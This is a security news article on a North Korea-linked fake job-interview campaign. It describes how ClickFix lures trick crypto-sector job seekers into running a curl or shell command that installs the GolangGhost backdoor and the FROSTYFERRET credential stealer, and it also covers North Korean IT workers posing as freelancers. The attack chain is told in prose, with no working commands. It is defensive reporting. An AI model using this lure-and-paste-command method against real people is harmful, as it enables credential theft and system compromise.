North Korea-linked cybercriminals have stepped up their social engineering tactics, using a new method dubbed ClickFix to deceive job seekers in the cryptocurrency sector. The campaign, part of a broader operation known as ClickFake Interview, involves deploying a newly identified malware called GolangGhost, which is capable of targeting both Windows and macOS systems.
First observed in late 2022, this campaign represents an evolution of previous fake job interview schemes, such as “Operation Dream Job,” which similarly targeted professionals in the crypto and tech industries with enticing job offers. In this latest variant, attackers masquerade as recruiters from prominent centralized finance platforms like Coinbase, Kraken, Circle, Robinhood, and others—marking a shift from previous focus on decentralized finance (DeFi) targets.
Victims are contacted via platforms like LinkedIn or X (formerly Twitter) and invited to participate in a supposed video interview. As part of the interview process, they are directed to a fake video service named Willo and asked to perform a system check. When attempting to activate their camera or microphone, a fabricated error message prompts users to download a “driver” to resolve the issue. This is the moment the ClickFix tactic is executed.
Depending on the user’s operating system, instructions vary:
-
Windows users are prompted to run a
curlcommand in Command Prompt that downloads and executes a Visual Basic Script (VBS), which launches a batch file to install GolangGhost. -
macOS users are instructed to run a shell script via Terminal, which triggers a secondary script that downloads both the FROSTYFERRET stealer (also known as ChromeUpdateAlert) and the backdoor.
FROSTYFERRET presents a fake Chrome permission prompt asking for camera/microphone access. Once users enter their system password—regardless of accuracy—the credentials are exfiltrated to a remote Dropbox account. Researchers believe this may be part of a broader effort to extract iCloud Keychain data.
GolangGhost allows remote attackers to control infected systems, exfiltrate files, harvest browser data, and collect system information. Interestingly, unlike earlier efforts that mainly targeted developers, this campaign is aimed at non-technical roles in business development, asset management, and DeFi project leadership.
Meanwhile, a separate yet connected operation has seen North Korean IT workers infiltrating European tech firms by posing as freelancers. These operatives have been observed using platforms like Upwork and Freelancer, fabricating personas with identities from countries such as Italy, Vietnam, Japan, and Singapore. Payments are often routed through cryptocurrencies or services like TransferWise and Payoneer, helping to obscure the money trail.
Recent trends also suggest a rise in insider extortion, with North Korean operatives threatening companies with data leaks unless ransom payments are made. They’re now increasingly targeting firms with Bring Your Own Device (BYOD) policies due to the lack of strong endpoint security on personal devices.
Security experts warn that Europe must not underestimate the threat, which has already expanded beyond the U.S. and shows signs of strategic adaptation by North Korean cyber units. From SWIFT banking hacks and ransomware to crypto heists and supply chain compromises, Pyongyang’s cyber operations continue to evolve as a key source of funding for the regime.
